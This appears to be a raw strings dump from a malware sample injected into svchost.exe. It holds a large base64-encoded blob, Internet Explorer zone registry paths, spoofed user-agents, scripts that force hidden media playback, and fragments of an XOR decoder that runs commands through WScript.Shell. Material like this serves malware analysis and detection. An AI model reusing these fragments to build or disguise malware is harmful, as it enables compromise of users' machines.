4hVjXqVVZ1zvh89QP3KkWoknQHJBor8qRuornGiIK3Azy/OkZNZ8dvu4BF4eNlZ ylMtd n6NYUMFAsPMFVcCp5riCv QJLU0cH8CxWwhpe3LU bL4dfZCyuZxVtJpQQjcSgKzK2zdCDtPRZUgo0ZjbbA5j0pXzJceUhUU2 3gGBXwXO3qybTJCQYhJFCJgussq9WVxjFKM7t91zIHKCdGCSXRoN4vBn1 yjFJuN7qowC1wpOTHO4Px0sKwHT3R0BStQccAL CWBsBvT3pHgt UyiVy0nAEqwkW6ORL3Yn x/QBoAKRohKjOA3qiq0P1CEDcQVkAOH3ceS8p9uBczn1sfXP 8n7q3Hkwnpxw7emo wVf2dS8EuLgBXvkufgMSTPh/KWYIWJK aNIlC5fYdqA6130llwEVFL9lYa8IHaqET84zqpZV9ApywvvRR/ydoUVnBiX24V2VqrBrnMoaIxT4ww71bTxxpFOD7LK52T3mj9oPyIsTVfTO5WbWr7/It/2j/eCspOBiNFYTik SnUl3XXJasnYIRnZHaZtX/ 5dQHO1hRMyG5d1TUUpyvPjUWQCPBrs1zj2JVBsqi0Lug1FmDRb4Hphc55wOtvZYO6zv1iwShwtqP3dbyhQ E66yCCdglju2JU 4zw5v4cBWqGIJPRSB7YRPL2LhnXbPNzsuKrCvA/nCz7HmPdp34g5pMcd8wPqh0jpx5QcvGK9GywKG330GLMTn7qFnOApziobstprpaga0zfFLpr2Ni 5rAG9juaEYZ8ES3XndpzC2QBw2cGnFYkB7BRH3NE5tNeg7SzxuUtCUPo0/PJZvIHt5Sq8xclSSatHNeEbYR 2dMKQ4vv3moTXVc40GtarkG8y8CLYwYjNDtm22CIeNq8/f0YoMEE8zGzWIWhCz7jWDVgD3H62bHwbscJJ4KUwiRSk4Om UrUzV X7AvENmT khv1luO9PmP6lrzTTUhZZWd3lmZlrIsgyMyQiQGCgz2njYQx0P3o9fObPjumMa3RvYi0vFvXl/ofhxzcnccq7 5T6NO2HKIEsN6t4lweBCBmYPjv8dp/h0lR7KFJPlMtdvzkZW0QrTdulQq1E45RdtVhWXhcuwmwGVz1RapaX2dgGfsy1e75vvxQ35Q5EkoYp0VE7F1NlJWYylGb3pN4C5iPG5 sDXXJzLs9WwIAXGU4X4FTG8QXuVW9xevMSl//s4PtqS4Wb1V7TH1V6IjV8QcUAt3TWA17WfH0CmcWO6pX3Sjhex2qTd2DjduSK7UqbZrNlaSuZgYZeB4g70T9pkgEN52M78g/lq8SYGJMtv182S7zf5pi87PfPlMyHx6DIfo2vztikWnXiuk6Hrvn04jLJ2yQqIrUgB Msl/t2OBmmgvXuWu7dum/BARM2fn2y68OQEW6W5KQd0TTuMUtxTgC1XE2qod5FSJknRDoJQuua3uJ7xAEhm6rmaAoDw/AqoHMVyCpRRE1IsfXcYEfZ4/MlkTI3aeY 3DpeyEdVUWj3lSZReJs2i3nxLoFsLwmvc2ze/OkLG10CihIl7UVu1BGo7v14bZWp5AuGlFNPJOp6rn66zjv2G9PN/RKb/q9vSouSI5BgO0DdRC kcgs0ol6jeGjfySpljStqDFHY44Eod vKsT5nhyjcERVUU/0Dl0mmQVob7BWpwgkQrVqmgFjfgg/G2P3jhH h4gPxdr0lHmDlrx BlJQCXsY3uuTXU2DKPFjDB0BakFtBdHQQ4MbIYK0X7OJiO6tBA1zBx0SUcATf 7uNeA5gdC254euPXliSrW8JFwDBMIH4diXWe3HHFyVAEO9NKnn LhUbiAEuwz4BHsIaA0SMeqT9HRch QndJGw/ wnP2fQBEyfbTEBBW8mKYIhHe64jWhp3XK68w4xTFMvTf29 mQuvElJ0t9z4ePY9pBCGdYvOCPJ2qvlyKb1R26HJ1255HFoioyWcV8PkmCxA3zFez1j sQsVRblBtejWlMwC9QuCoRygDvT28C06viV8bSlvyFA0jrvqiWr3xSFDicmis8wNYfNpTeJM48RWSjKi83maskgpeYl sWifQYNfLxIEmJ/QsWXOUs7uIabjoZlC8vAY14mTfszg9zZDm214qJimYJvwgv xdPZDKC73hN6Nzpw6jOylC7dU1GesKS/BNDTz0XKJizFDS3qdShIuB3D4Yg9LA9RMCNESl1k0fZFQzdlwG5hrmg6FN50s3a/YoRgGHbQLgV7FVAHt/CQ5waA8LSS4 8fKdzjzZm59ZnCLG3lcADgbeMPU1 1slH5Rf3tByagaY22TLMmeaiEGeyat8eImgWJh9scEMSpGo4 sjyWtbQS uBBwPPN8EY3bNC7pK5qXw/XYs3WpG4MmEotCLAkar053JAKiy5n 7k0LNTucDhmfL6S7ihLshfR5R8/qY4To8dfBkjmpQD 8bQd9OtnzWQOnQNk6kD4 WigsSP49uYu6Bo0bxMgrq IpnAdO6CxlUpKD2l B11uTiLkjsjs5Ey9cMSs8qUq19G6Nk yUr3bW A/7EJ75MvAX8XnpbuajNjhHyg/W1omrs5t9oI/W0SJLtca62q8cnCxlEFXK0hfxPbDs8UQui88Yha4dfp9PbHDGkh7LkvkGW7CjLsv5Gr2EKpzt3/FJ9s9Z8ghlMtr4ccaM9tF3q42nJB1qc57m bHSkE1rR/45EUZ5Hl8jX4XfM1BnodKvXurFpyCmZcR6IvMxvKgoYH01x2HiXrNbXuPltTsYChzYPn0vLf9AI2quM7Ca1H1ge38n4NFU3dUchWwRbr1RyI3xTNrF6pFMouB1YdrchH4TnDJoKoWPrjokTsT0C7kTnunZOYGvVPBgAYq8ldh05ItdpwUMVLnxpmsxHixBIFW7x2 s/ezpDm3r fOkNPR/wCKR7Tk7n8Tbh12HRCnslr1jSFbuC2ElvGGYVIQ35p9hAveyXDAN3qObdqgw3J LmjFszDREW DHVE488lC bZ6JiyN5BmuBIIKLRPmZXN4qGZGuOH55RwHYgvXONYe018OiUeOpcIKVUvTmz1M1qDjASEaQpnecdGeugQ/QbMuZB/veq/SHR OZarDO BO UQ8s0/V1Z lU4bU0JkTN1fiInZKnC5YsfZOGh5xEKZTsiB7TKTFA96GwQlAIKmkLSZ6RqqRnW5pCGzugAD6HlQEmNbGY SDuz9RFBdIg394S3eG9BQaqGFGOdxK4FIBBm5pg1efkq9wM5e3ItHt6oFkA mNArXVJnXp3z2l/sx9u32H5Al33guWzylllwn8lyrWcZNWkBpt5EIYEVuCEzm8CcTfz5zlnI5uSeWLYaDjTJa qebJDEp e3jZzSQzPO8oNqYRrM1iUX9oR4JfxN2VGOf3S5o2d/T mGa2CFciQHXlngJv1GBLZZkoFw3uNAHi54gBzE4mqOqUOORvqJOWNdd657rWO12FAzkgyrycbCRR HAgH2H/3uspgawgfeVoNDJm6T69CRssEFvRGKhYFnJUhRMGLE/bsqCnxEEhHAecYCXeBkMkOdqXTdEhkwl1mPIlocsMYUmvpqCP7H1DplJ1/GwFCSM4qku9 TjrCxIom7QPXqrTbCwCZN9f5jZiW7AZFT3jOMWtPcFYojPUPAEa7fwwFa4dfoSjBTdq1HA1yim70WrxShO9J12Rc4Ejnk6DlhDU48y0GMvQ9OfA5jaq2D2e20G1ot571IvFuy2oU4gp4SQsYoWihHlvYX1GPQwe3I6QYobvtfAcQ1XLVT6IY571f4HkDAmLcSe5xlq4GotRjkHqPoT0U9OjwdTG4RY8/2Cn6NM16mTK8bWhrzK1x0qGoBbGWbCU o8IKk1uI7w9q t I81C2bLFHMVWTzlB4Iy7wWVM19jAPOhLVB f98VjJJOx6hDglbljzaWUBuqYKm0afntFvKkF0nRZo9ZNcKoBZ/am1U02zYppGWkKXfY0VkBZDqa21QFDkyohtDVeoCP1NnVEkbXv/8bHWqeEOZiGcp4CmA/lhzlnMNf8fKgT656xMkIZLHc0WwecT967vPfXdyahZDaVyGSrjdhWswsHSpx9NcTT8w7KX8kM750DhA bP6WrxiRupDuHDHFDwH75ikMUYtpeNFWQM25U9J 2ey2HqyVpghmMU0a1V1tDJDtKs4glEUskMdGjI13Fbq1WKjGYNKq2Pkuc1LyoAyrML8jjyZ317BrqMqRN1emBd8c8dWZiq1j18/wovTZc0qGJ1vTKDqLp6p3ptdKuTh6SeEDYN2F3HDsftitXHxYpydPAB mF2YmIdGikVCT3AASvID39DXYidXo7Yk MfTWkal4l6L6dPnYzxebm nBNlIrKynVPPQ0ISgseYCGBjo/y/1CcBgUUhe620kXoYvMlHzi86aftheeirJIVz4AmKW75GAmZGXruIQr18DdtBaaZgy5nPX8S2sc7B1PkEu3AR/ 7xOAcKmDN/bgSWet9uLbsL/tz0DZ//y7HvshyB08gKO00klNpewoFePk1u7V fctI0gRpz1rZhz4/PlkEUyvCc7 Ge9LqxIUfM 0/l87bAJGhMbpK nNlqDVo9UWyz40B8tPEv8UakNRju6biU Kz79Od7Ul7HB5InxblzqBRQxcYszUYmh3Xckd/prNXnL 66ze k/aYtUP46d8tEnNOHFyl5vqX/RhDXGglxClrRfSOUD04l8dHOG6DgUsPzDtZ8 b0a6ULYdjlZ7V5WaB7r/FLr2AbF4672A85JVt2eIvN5wF8z/66Ju29JfXggSyonEYQf9PGDzX7LkmbqyMPXhjwPnShcGcFIcInswotoj2JKnp9R8QUXS5xP8RBHjpur6/adfZj7/cl0mu5ZCkPL0OKkxhk97m3P1BmPdzHsIHLBoynG2 ZiZf4wImTixwy0twy01Ud7tlVaMQ8f9ZhBuH5JUIf0 peZl3NTbjDS2rwXHC8hM8qKLMRkwOK1o71yveLrg6rJVdtfIYs4AZRGiVcsIxKM/ioAIh 3M IngboQPJtq/HtHFsxST0TgiMJZJK QONshSV/ntzXMpqxMzudlXMhiOhfPFKBG1fk3rrvxlTenuay NiLSXE2zjo9ijHRBdfoXHeYsBYerXth1pCxug6oRXvvhHx98sWFoTFS2nDLT/PE3Ch2oz RQ62S/mz7Bumzq7o1QrMLAedEx6JFKhJ56AVUsKKrqPQhz0Xs5HhQtmFviOnlZwFIve/liZvZ9hva9ax/xWO6CVFbyX4p6gTVpiJcb3nbAfwd2RsvDsphxC7/L2zOQ 9 oDk1DFxxqahMrmBk1NL0nlcVrn4p9FqhVHVJb1eSMX60EUyJAFQx7aub8ZRgGjDolQdNTSGR52IZc9tklef0R agccDIpUtvSWk8D9AM3ZlN6VCsqEX pvfWMFXzskuU4FOzCpsH2baMNbo Qfg8hpOzrFsHwjOG 4RMpiIHcqP5fINrN1Jl4hDWYZuvttYtRPidECBesYX2NREqTmtoQfGgsF5Lu2PSpnHUzD7CrZIso6DBQtJf2uoGAStiRPe3uPo5ypA/HpItvFFXnbYJ4tJWIIjKWD8ViskcRwGdRVk ysoJx7IKnDewRWpSyTRPSuocoSGTjxcTkIIcfmNVhTz630dLAWlkaIzntjY1UPyfahpf6GYUOYSsynB6vYQ6j1JAzsJ4YWLbHaLa/M9en3qyQjbuBFhdm5 AzDH4QuVtuNNuUK6eg24d0PB1px/SQw==plYbyktzMmNpkpcBPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD
4hVjXqVVZ1zvh89QP3KkWoknQHJBor8qRuornGiIK3Azy/OkZNZ8dvu4BF4eNlZ ylMtd n6NYUMFAsPMFVcCp5riCv QJLU0cH8CxWwhpe3LU bL4dfZCyuZxVtJpQQjcSgKzK2zdCDtPRZUgo0ZjbbA5j0pXzJceUhUU2 3gGBXwXO3qybTJCQYhJFCJgussq9WVxjFKM7t91zIHKCdGCSXRoN4vBn1 yjFJuN7qowC1wpOTHO4Px0sKwHT3R0BStQccAL CWBsBvT3pHgt UyiVy0nAEqwkW6ORL3Yn x/QBoAKRohKjOA3qiq0P1CEDcQVkAOH3ceS8p9uBczn1sfXP 8n7q3Hkwnpxw7emo wVf2dS8EuLgBXvkufgMSTPh/KWYIWJK aNIlC5fYdqA6130llwEVFL9lYa8IHaqET84zqpZV9ApywvvRR/ydoUVnBiX24V2VqrBrnMoaIxT4ww71bTxxpFOD7LK52T3mj9oPyIsTVfTO5WbWr7/It/2j/eCspOBiNFYTik SnUl3XXJasnYIRnZHaZtX/ 5dQHO1hRMyG5d1TUUpyvPjUWQCPBrs1zj2JVBsqi0Lug1FmDRb4Hphc55wOtvZYO6zv1iwShwtqP3dbyhQ E66yCCdglju2JU 4zw5v4cBWqGIJPRSB7YRPL2LhnXbPNzsuKrCvA/nCz7HmPdp34g5pMcd8wPqh0jpx5QcvGK9GywKG330GLMTn7qFnOApziobstprpaga0zfFLpr2Ni 5rAG9juaEYZ8ES3XndpzC2QBw2cGnFYkB7BRH3NE5tNeg7SzxuUtCUPo0/PJZvIHt5Sq8xclSSatHNeEbYR 2dMKQ4vv3moTXVc40GtarkG8y8CLYwYjNDtm22CIeNq8/f0YoMEE8zGzWIWhCz7jWDVgD3H62bHwbscJJ4KUwiRSk4Om UrUzV X7AvENmT khv1luO9PmP6lrzTTUhZZWd3lmZlrIsgyMyQiQGCgz2njYQx0P3o9fObPjumMa3RvYi0vFvXl/ofhxzcnccq7 5T6NO2HKIEsN6t4lweBCBmYPjv8dp/h0lR7KFJPlMtdvzkZW0QrTdulQq1E45RdtVhWXhcuwmwGVz1RapaX2dgGfsy1e75vvxQ35Q5EkoYp0VE7F1NlJWYylGb3pN4C5iPG5 sDXXJzLs9WwIAXGU4X4FTG8QXuVW9xevMSl//s4PtqS4Wb1V7TH1V6IjV8QcUAt3TWA17WfH0CmcWO6pX3Sjhex2qTd2DjduSK7UqbZrNlaSuZgYZeB4g70T9pkgEN52M78g/lq8SYGJMtv182S7zf5pi87PfPlMyHx6DIfo2vztikWnXiuk6Hrvn04jLJ2yQqIrUgB Msl/t2OBmmgvXuWu7dum/BARM2fn2y68OQEW6W5KQd0TTuMUtxTgC1XE2qod5FSJknRDoJQuua3uJ7xAEhm6rmaAoDw/AqoHMVyCpRRE1IsfXcYEfZ4/MlkTI3aeY 3DpeyEdVUWj3lSZReJs2i3nxLoFsLwmvc2ze/OkLG10CihIl7UVu1BGo7v14bZWp5AuGlFNPJOp6rn66zjv2G9PN/RKb/q9vSouSI5BgO0DdRC kcgs0ol6jeGjfySpljStqDFHY44Eod vKsT5nhyjcERVUU/0Dl0mmQVob7BWpwgkQrVqmgFjfgg/G2P3jhH h4gPxdr0lHmDlrx BlJQCXsY3uuTXU2DKPFjDB0BakFtBdHQQ4MbIYK0X7OJiO6tBA1zBx0SUcATf 7uNeA5gdC254euPXliSrW8JFwDBMIH4diXWe3HHFyVAEO9NKnn LhUbiAEuwz4BHsIaA0SMeqT9HRch QndJGw/ wnP2fQBEyfbTEBBW8mKYIhHe64jWhp3XK68w4xTFMvTf29 mQuvElJ0t9z4ePY9pBCGdYvOCPJ2qvlyKb1R26HJ1255HFoioyWcV8PkmCxA3zFez1j sQsVRblBtejWlMwC9QuCoRygDvT28C06viV8bSlvyFA0jrvqiWr3xSFDicmis8wNYfNpTeJM48RWSjKi83maskgpeYl sWifQYNfLxIEmJ/QsWXOUs7uIabjoZlC8vAY14mTfszg9zZDm214qJimYJvwgv xdPZDKC73hN6Nzpw6jOylC7dU1GesKS/BNDTz0XKJizFDS3qdShIuB3D4Yg9LA9RMCNESl1k0fZFQzdlwG5hrmg6FN50s3a/YoRgGHbQLgV7FVAHt/CQ5waA8LSS4 8fKdzjzZm59ZnCLG3lcADgbeMPU1 1slH5Rf3tByagaY22TLMmeaiEGeyat8eImgWJh9scEMSpGo4 sjyWtbQS uBBwPPN8EY3bNC7pK5qXw/XYs3WpG4MmEotCLAkar053JAKiy5n 7k0LNTucDhmfL6S7ihLshfR5R8/qY4To8dfBkjmpQD 8bQd9OtnzWQOnQNk6kD4 WigsSP49uYu6Bo0bxMgrq IpnAdO6CxlUpKD2l B11uTiLkjsjs5Ey9cMSs8qUq19G6Nk yUr3bW A/7EJ75MvAX8XnpbuajNjhHyg/W1omrs5t9oI/W0SJLtca62q8cnCxlEFXK0hfxPbDs8UQui88Yha4dfp9PbHDGkh7LkvkGW7CjLsv5Gr2EKpzt3/FJ9s9Z8ghlMtr4ccaM9tF3q42nJB1qc57m bHSkE1rR/45EUZ5Hl8jX4XfM1BnodKvXurFpyCmZcR6IvMxvKgoYH01x2HiXrNbXuPltTsYChzYPn0vLf9AI2quM7Ca1H1ge38n4NFU3dUchWwRbr1RyI3xTNrF6pFMouB1YdrchH4TnDJoKoWPrjokTsT0C7kTnunZOYGvVPBgAYq8ldh05ItdpwUMVLnxpmsxHixBIFW7x2 s/ezpDm3r fOkNPR/wCKR7Tk7n8Tbh12HRCnslr1jSFbuC2ElvGGYVIQ35p9hAveyXDAN3qObdqgw3J LmjFszDREW DHVE488lC bZ6JiyN5BmuBIIKLRPmZXN4qGZGuOH55RwHYgvXONYe018OiUeOpcIKVUvTmz1M1qDjASEaQpnecdGeugQ/QbMuZB/veq/SHR OZarDO BO UQ8s0/V1Z lU4bU0JkTN1fiInZKnC5YsfZOGh5xEKZTsiB7TKTFA96GwQlAIKmkLSZ6RqqRnW5pCGzugAD6HlQEmNbGY SDuz9RFBdIg394S3eG9BQaqGFGOdxK4FIBBm5pg1efkq9wM5e3ItHt6oFkA mNArXVJnXp3z2l/sx9u32H5Al33guWzylllwn8lyrWcZNWkBpt5EIYEVuCEzm8CcTfz5zlnI5uSeWLYaDjTJa qebJDEp e3jZzSQzPO8oNqYRrM1iUX9oR4JfxN2VGOf3S5o2d/T mGa2CFciQHXlngJv1GBLZZkoFw3uNAHi54gBzE4mqOqUOORvqJOWNdd657rWO12FAzkgyrycbCRR HAgH2H/3uspgawgfeVoNDJm6T69CRssEFvRGKhYFnJUhRMGLE/bsqCnxEEhHAecYCXeBkMkOdqXTdEhkwl1mPIlocsMYUmvpqCP7H1DplJ1/GwFCSM4qku9 TjrCxIom7QPXqrTbCwCZN9f5jZiW7AZFT3jOMWtPcFYojPUPAEa7fwwFa4dfoSjBTdq1HA1yim70WrxShO9J12Rc4Ejnk6DlhDU48y0GMvQ9OfA5jaq2D2e20G1ot571IvFuy2oU4gp4SQsYoWihHlvYX1GPQwe3I6QYobvtfAcQ1XLVT6IY571f4HkDAmLcSe5xlq4GotRjkHqPoT0U9OjwdTG4RY8/2Cn6NM16mTK8bWhrzK1x0qGoBbGWbCU o8IKk1uI7w9q t I81C2bLFHMVWTzlB4Iy7wWVM19jAPOhLVB f98VjJJOx6hDglbljzaWUBuqYKm0afntFvKkF0nRZo9ZNcKoBZ/am1U02zYppGWkKXfY0VkBZDqa21QFDkyohtDVeoCP1NnVEkbXv/8bHWqeEOZiGcp4CmA/lhzlnMNf8fKgT656xMkIZLHc0WwecT967vPfXdyahZDaVyGSrjdhWswsHSpx9NcTT8w7KX8kM750DhA bP6WrxiRupDuHDHFDwH75ikMUYtpeNFWQM25U9J 2ey2HqyVpghmMU0a1V1tDJDtKs4glEUskMdGjI13Fbq1WKjGYNKq2Pkuc1LyoAyrML8jjyZ317BrqMqRN1emBd8c8dWZiq1j18/wovTZc0qGJ1vTKDqLp6p3ptdKuTh6SeEDYN2F3HDsftitXHxYpydPAB mF2YmIdGikVCT3AASvID39DXYidXo7Yk MfTWkal4l6L6dPnYzxebm nBNlIrKynVPPQ0ISgseYCGBjo/y/1CcBgUUhe620kXoYvMlHzi86aftheeirJIVz4AmKW75GAmZGXruIQr18DdtBaaZgy5nPX8S2sc7B1PkEu3AR/ 7xOAcKmDN/bgSWet9uLbsL/tz0DZ//y7HvshyB08gKO00klNpewoFePk1u7V fctI0gRpz1rZhz4/PlkEUyvCc7 Ge9LqxIUfM 0/l87bAJGhMbpK nNlqDVo9UWyz40B8tPEv8UakNRju6biU Kz79Od7Ul7HB5InxblzqBRQxcYszUYmh3Xckd/prNXnL 66ze k/aYtUP46d8tEnNOHFyl5vqX/RhDXGglxClrRfSOUD04l8dHOG6DgUsPzDtZ8 b0a6ULYdjlZ7V5WaB7r/FLr2AbF4672A85JVt2eIvN5wF8z/66Ju29JfXggSyonEYQf9PGDzX7LkmbqyMPXhjwPnShcGcFIcInswotoj2JKnp9R8QUXS5xP8RBHjpur6/adfZj7/cl0mu5ZCkPL0OKkxhk97m3P1BmPdzHsIHLBoynG2 ZiZf4wImTixwy0twy01Ud7tlVaMQ8f9ZhBuH5JUIf0 peZl3NTbjDS2rwXHC8hM8qKLMRkwOK1o71yveLrg6rJVdtfIYs4AZRGiVcsIxKM/ioAIh 3M IngboQPJtq/HtHFsxST0TgiMJZJK QONshSV/ntzXMpqxMzudlXMhiOhfPFKBG1fk3rrvxlTenuay NiLSXE2zjo9ijHRBdfoXHeYsBYerXth1pCxug6oRXvvhHx98sWFoTFS2nDLT/PE3Ch2oz RQ62S/mz7Bumzq7o1QrMLAedEx6JFKhJ56AVUsKKrqPQhz0Xs5HhQtmFviOnlZwFIve/liZvZ9hva9ax/xWO6CVFbyX4p6gTVpiJcb3nbAfwd2RsvDsphxC7/L2zOQ 9 oDk1DFxxqahMrmBk1NL0nlcVrn4p9FqhVHVJb1eSMX60EUyJAFQx7aub8ZRgGjDolQdNTSGR52IZc9tklef0R agccDIpUtvSWk8D9AM3ZlN6VCsqEX pvfWMFXzskuU4FOzCpsH2baMNbo Qfg8hpOzrFsHwjOG 4RMpiIHcqP5fINrN1Jl4hDWYZuvttYtRPidECBesYX2NREqTmtoQfGgsF5Lu2PSpnHUzD7CrZIso6DBQtJf2uoGAStiRPe3uPo5ypA/HpItvFFXnbYJ4tJWIIjKWD8ViskcRwGdRVk ysoJx7IKnDewRWpSyTRPSuocoSGTjxcTkIIcfmNVhTz630dLAWlkaIzntjY1UPyfahpf6GYUOYSsynB6vYQ6j1JAzsJ4YWLbHaLa/M9en3qyQjbuBFhdm5 AzDH4QuVtuNNuUK6eg24d0PB1px/SQw==plYbyktzMmNpkpcBPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADc
.Default
SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
svchost.exe
explorer.exe
66006666
.Method '%s' not supported by automation object/Variant does not reference an automation object
External exception %x
Interface not supported
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction%Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'
Invalid variant operation"Variant method calls not supported
I/O error %d
Integer overflow Invalid floating point operation
c:\%original file name%.exe path<<c:\%original file name%.exe>>path

svchost.exe_152_rwx_00090000_000B2000:

.idata
.reloc
P.rsrc
Portions Copyright (c) 1983,99 Borland
kernel32.dll
Software\Microsoft\Windows NT\CurrentVersion
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
URLMON.DLL
Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].play();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].Play();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].PLAY();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].play();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].Play();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].PLAY();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].playVideo();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].playVideo();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].start();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].Start();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].START();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].start();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].Start();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].START();}} catch(e){}
try {var els=document.getElementsByTagName('video'); for(var i=0;i<els.length;i  ){ els[i].play();}} catch(e){}
try {jwplayer().play()} catch(e){}
PSAPI.dll
setcpu:
:setcpu
HTTP/1.1
.length;
 =String.fromCharCode(parseInt(
.substr(
,2),16));
 =String.fromCharCode(
,1).charCodeAt()^
,1).charCodeAt());
.length-1)?
=new ActiveXObject("WScript.Shell");
.Environment("Process"))("
.Run("
=new ActiveXObject("WScript.Shell");
.RegRead("
wininet.dll
user32.dll
ntdll.dll
psapi.dll
"svchost.exe"
svchost.exe
ole32.dll
Kernel32.dll
\\.\LCD
1234567890
Shell32.dll
\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
hXXp://
0123456789
Mozilla
?456789:;<=
!"#$%&'()* ,-./0123
.text
`.rdata
@.pdata
KERNEL32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
oleaut32.dll
RegOpenKeyExW
RegCreateKeyW
RegCreateKeyA
GetCPInfo
SetProcessWindowStation
OpenWindowStationA
EnumChildWindows
NtQueryValueKey
NtDeleteValueKey
NtSetValueKey
HttpSendRequestA
HttpOpenRequestA
atl.dll
wsock32.dll
shell32.dll
ShellExecuteExW
wtsapi32.dll
Wtsapi32.dll
PSAPI.DLL
winmm.dll
urlmon.dll
UrlMkSetSessionOption
<%<*<;<@<
:!:%:):-:1:
?:???_?}?
4hVjXqVVZ1zvh89QP3KkWoknQHJBor8qRuornGiIK3Azy/OkZNZ8dvu4BF4eNlZ ylMtd n6NYUMFAsPMFVcCp5riCv QJLU0cH8CxWwhpe3LU bL4dfZCyuZxVtJpQQjcSgKzK2zdCDtPRZUgo0ZjbbA5j0pXzJceUhUU2 3gGBXwXO3qybTJCQYhJFCJgussq9WVxjFKM7t91zIHKCdGCSXRoN4vBn1 yjFJuN7qowC1wpOTHO4Px0sKwHT3R0BStQccAL CWBsBvT3pHgt UyiVy0nAEqwkW6ORL3Yn x/QBoAKRohKjOA3qiq0P1CEDcQVkAOH3ceS8p9uBczn1sfXP 8n7q3Hkwnpxw7emo wVf2dS8EuLgBXvkufgMSTPh/KWYIWJK aNIlC5fYdqA6130llwEVFL9lYa8IHaqET84zqpZV9ApywvvRR/ydoUVnBiX24V2VqrBrnMoaIxT4ww71bTxxpFOD7LK52T3mj9oPyIsTVfTO5WbWr7/It/2j/eCspOBiNFYTik SnUl3XXJasnYIRnZHaZtX/ 5dQHO1hRMyG5d1TUUpyvPjUWQCPBrs1zj2JVBsqi0Lug1FmDRb4Hphc55wOtvZYO6zv1iwShwtqP3dbyhQ E66yCCdglju2JU 4zw5v4cBWqGIJPRSB7YRPL2LhnXbPNzsuKrCvA/nCz7HmPdp34g5pMcd8wPqh0jpx5QcvGK9GywKG330GLMTn7qFnOApziobstprpaga0zfFLpr2Ni 5rAG9juaEYZ8ES3XndpzC2QBw2cGnFYkB7BRH3NE5tNeg7SzxuUtCUPo0/PJZvIHt5Sq8xclSSatHNeEbYR 2dMKQ4vv3moTXVc40GtarkG8y8CLYwYjNDtm22CIeNq8/f0YoMEE8zGzWIWhCz7jWDVgD3H62bHwbscJJ4KUwiRSk4Om UrUzV X7AvENmT khv1luO9PmP6lrzTTUhZZWd3lmZlrIsgyMyQiQGCgz2njYQx0P3o9fObPjumMa3RvYi0vFvXl/ofhxzcnccq7 5T6NO2HKIEsN6t4lweBCBmYPjv8dp/h0lR7KFJPlMtdvzkZW0QrTdulQq1E45RdtVhWXhcuwmwGVz1RapaX2dgGfsy1e75vvxQ35Q5EkoYp0VE7F1NlJWYylGb3pN4C5iPG5 sDXXJzLs9WwIAXGU4X4FTG8QXuVW9xevMSl//s4PtqS4Wb1V7TH1V6IjV8QcUAt3TWA17WfH0CmcWO6pX3Sjhex2qTd2DjduSK7UqbZrNlaSuZgYZeB4g70T9pkgEN52M78g/lq8SYGJMtv182S7zf5pi87PfPlMyHx6DIfo2vztikWnXiuk6Hrvn04jLJ2yQqIrUgB Msl/t2OBmmgvXuWu7dum/BARM2fn2y68OQEW6W5KQd0TTuMUtxTgC1XE2qod5FSJknRDoJQuua3uJ7xAEhm6rmaAoDw/AqoHMVyCpRRE1IsfXcYEfZ4/MlkTI3aeY 3DpeyEdVUWj3lSZReJs2i3nxLoFsLwmvc2ze/OkLG10CihIl7UVu1BGo7v14bZWp5AuGlFNPJOp6rn66zjv2G9PN/RKb/q9vSouSI5BgO0DdRC kcgs0ol6jeGjfySpljStqDFHY44Eod 